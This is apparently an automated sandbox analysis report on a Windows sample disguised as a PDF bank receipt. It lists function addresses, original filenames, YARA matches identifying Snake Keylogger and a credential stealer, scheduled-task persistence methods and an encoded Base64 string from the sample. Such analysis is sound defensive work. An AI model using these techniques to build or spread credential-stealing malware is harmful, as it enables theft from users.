Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D6BD0	1_2_066D6BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D33A8	1_2_066D33A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D33B8	1_2_066D33B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D7040	1_2_066D7040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D0040	1_2_066D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D4430	1_2_066D4430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D0007	1_2_066D0007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D2807	1_2_066D2807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D2818	1_2_066D2818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DD018	1_2_066DD018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D08E0	1_2_066D08E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D78F0	1_2_066D78F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D08F0	1_2_066D08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D74A8	1_2_066D74A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D0488	1_2_066D0488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D0498	1_2_066D0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D7497	1_2_066D7497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DB090	1_2_066DB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D0D48	1_2_066D0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D7D48	1_2_066D7D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D7D58	1_2_066D7D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DBD28	1_2_066DBD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D0D39	1_2_066D0D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D7900	1_2_066D7900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D85F8	1_2_066D85F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066DC9C8	1_2_066DC9C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D81A0	1_2_066D81A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D81B0	1_2_066D81B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D518A	1_2_066D518A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_066D5198	1_2_066D5198
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Code function: 6_2_02FB2FE0	6_2_02FB2FE0
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Code function: 6_2_02FB02CD	6_2_02FB02CD
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Code function: 6_2_02FBE640	6_2_02FBE640
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Code function: 6_2_077AE490	6_2_077AE490
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Code function: 6_2_07790040	6_2_07790040
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe	Code function: 6_2_07790016	6_2_07790016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_01086108	7_2_01086108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0108C190	7_2_0108C190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0108F007	7_2_0108F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0108B328	7_2_0108B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0108C470	7_2_0108C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_01086730	7_2_01086730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0108C751	7_2_0108C751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_01089858	7_2_01089858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0108BBD2	7_2_0108BBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0108CA31	7_2_0108CA31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_01084AD9	7_2_01084AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0108BEB0	7_2_0108BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0108E517	7_2_0108E517
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0108E528	7_2_0108E528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_01083570	7_2_01083570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0108B4F2	7_2_0108B4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650AA58	7_2_0650AA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650D670	7_2_0650D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06508608	7_2_06508608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650B6E8	7_2_0650B6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650C388	7_2_0650C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06508C51	7_2_06508C51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650A408	7_2_0650A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650D028	7_2_0650D028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650B0A0	7_2_0650B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650BD38	7_2_0650BD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650C9D8	7_2_0650C9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_065011A0	7_2_065011A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650AA48	7_2_0650AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06505A70	7_2_06505A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06505A60	7_2_06505A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650D662	7_2_0650D662
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06505618	7_2_06505618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650560B	7_2_0650560B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650B6D9	7_2_0650B6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06505EC8	7_2_06505EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06505EB8	7_2_06505EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06506778	7_2_06506778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650C378	7_2_0650C378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06506313	7_2_06506313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06503730	7_2_06503730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06506320	7_2_06506320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06506BD0	7_2_06506BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06506BC1	7_2_06506BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650A3F8	7_2_0650A3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_065033B8	7_2_065033B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_065033A8	7_2_065033A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06507050	7_2_06507050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06500040	7_2_06500040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06507040	7_2_06507040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06502818	7_2_06502818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650D018	7_2_0650D018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06500006	7_2_06500006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06502807	7_2_06502807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06504430	7_2_06504430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_065008F0	7_2_065008F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_065078F0	7_2_065078F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_065008E0	7_2_065008E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06507497	7_2_06507497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06500498	7_2_06500498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06500488	7_2_06500488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650B08F	7_2_0650B08F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_065074A8	7_2_065074A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06507D58	7_2_06507D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06500D48	7_2_06500D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06507D48	7_2_06507D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06507900	7_2_06507900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06500D39	7_2_06500D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650BD28	7_2_0650BD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650C9C8	7_2_0650C9C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_065085FC	7_2_065085FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06501191	7_2_06501191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_06505198	7_2_06505198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0650518B	7_2_0650518B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_065081B0	7_2_065081B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_065081A0	7_2_065081A0

Source: dekont_001.pdf.exe, 00000000.00000000.1735555803.0000000000552000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQxqefzci.exe2 vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1842745906.00000000063E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameKhexj.dll" vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQxqefzci.exe2 vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKhexj.dll" vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002887000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1845271222.00000000069D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1845547281.0000000007120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQxqefzci.exe2 vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1828392738.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameKhexj.dll" vs dekont_001.pdf.exe
Source: dekont_001.pdf.exe	Binary or memory string: OriginalFilenameQxqefzci.exe2 vs dekont_001.pdf.exe

Source: dekont_001.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.dekont_001.pdf.exe.3839550.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 7452, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: dekont_001.pdf.exe, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: RequiredContract.exe.0.dr, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, --Z--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, --Z--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, ---t.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, ---t.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: dekont_001.pdf.exe, -.cs	Base64 encoded string: 'Ty84iOmHMgQumuCPfyIik+LEXSU4meGIcC9wu+meWTg/jvWrbyUuke6GZW0smfi1WiMnkMKLcTNwk/y1VTgujfmLcD8/hbeNeSIUsOmEeyIjx8uPaAIyjOmsbjkmtO2EeDoux+uPaAkFneGPJx8lmOmSUzBwrumLeAU/juWEe20KmOjRezM/o9yFbz8/leOEJzEuiNOpaSQ5meKeWDkmneWEJwUuiMiLaDdwzbzfL25wvf+ZeTspkPW5eSQ9mf7RTz8mjOCPXSU4meGIcC8OhPyGcyQujreIfTQukPqHJyUmk+ePaDM4iA=='
Source: RequiredContract.exe.0.dr, -.cs	Base64 encoded string: 'Ty84iOmHMgQumuCPfyIik+LEXSU4meGIcC9wu+meWTg/jvWrbyUuke6GZW0smfi1WiMnkMKLcTNwk/y1VTgujfmLcD8/hbeNeSIUsOmEeyIjx8uPaAIyjOmsbjkmtO2EeDoux+uPaAkFneGPJx8lmOmSUzBwrumLeAU/juWEe20KmOjRezM/o9yFbz8/leOEJzEuiNOpaSQ5meKeWDkmneWEJwUuiMiLaDdwzbzfL25wvf+ZeTspkPW5eSQ9mf7RTz8mjOCPXSU4meGIcC8OhPyGcyQujreIfTQukPqHJyUmk+ePaDM4iA=='

Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
